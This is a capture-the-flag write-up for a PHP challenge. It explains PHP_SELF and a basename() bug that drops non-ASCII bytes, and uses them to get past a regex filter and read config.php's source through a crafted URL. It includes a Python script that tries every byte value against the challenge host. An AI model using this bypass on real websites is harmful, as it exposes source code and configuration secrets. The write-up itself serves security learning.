Pre-knowledge
Some new functions and variables learned
New variable attribute: PHP_SELF
$_SERVER['PHP_SELF']
Holds the path of the currently executing PHP file relative to the document root of the website (for a request to /index.php/config.php it contains the script name plus any trailing path info).
Below is a screenshot of a local test that prints "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] (the screenshot was not captured with the text).
New PHP function: basename
basename()
The function returns the file-name component of a path.
If the path is /index.php/config.php, the browser resolves it to index.php (the script actually executed), while basename() returns config.php, the last component. Even when extra characters follow the file name, basename() still returns only the file-name part.
basename broken with non-ASCII chars
Below is the English description from the [official bug report](https://bugs.php.net/bug.php?id=62119):
With the default locale setting "C", basename() drops non-ASCII chars at the beginning of a filename.
    var_dump(basename("\xffconfig.php")); // => config.php
    var_dump(basename("config.php/\xff")); // => config.php
Simply put, basename() has a problem: it strips non-ASCII bytes from the file-name part, both at the beginning of the name and in a trailing component after the last slash.
WP part
This challenge is actually very simple. Once the functions above are understood, the most important finding of the code audit is the regular-expression filter /config.php/*$/i, and we only need to bypass it. The reason it can be bypassed is simple: the pattern only matches the tail of the path, so we construct xxxxx.node3.buuoj.cn/index.php/config.php/%ff?source.
On the one hand, the trailing %ff byte means the regular expression no longer matches; on the other hand, the isset check on the source parameter is still satisfied, and because basename() drops the trailing non-ASCII byte it still resolves to config.php, so we get config.php.
Of course, you can also use the script to try which characters are not filtered out.
    import re
    import requests

    # Try every single byte value after config.php/ and see which one both slips past
    # the tail regex and still lets basename() resolve to config.php.
    # range(256) so that 0xff (the byte used in the write-up) is included.
    for i in range(256):
        # xxxxx is the challenge host placeholder from the write-up; requests needs a scheme.
        # The byte is sent percent-encoded so that exactly one raw byte reaches PHP
        # (passing chr(i) directly would make requests UTF-8-encode values above 0x7f).
        url = 'http://xxxxx.node3.buuoj.cn/index.php/config.php/%{:02x}?source'.format(i)
        print(url)
        r = requests.get(url)
        flag = re.findall(r"flag\{.*?\}", r.text)
        if flag:
            print(flag)
            break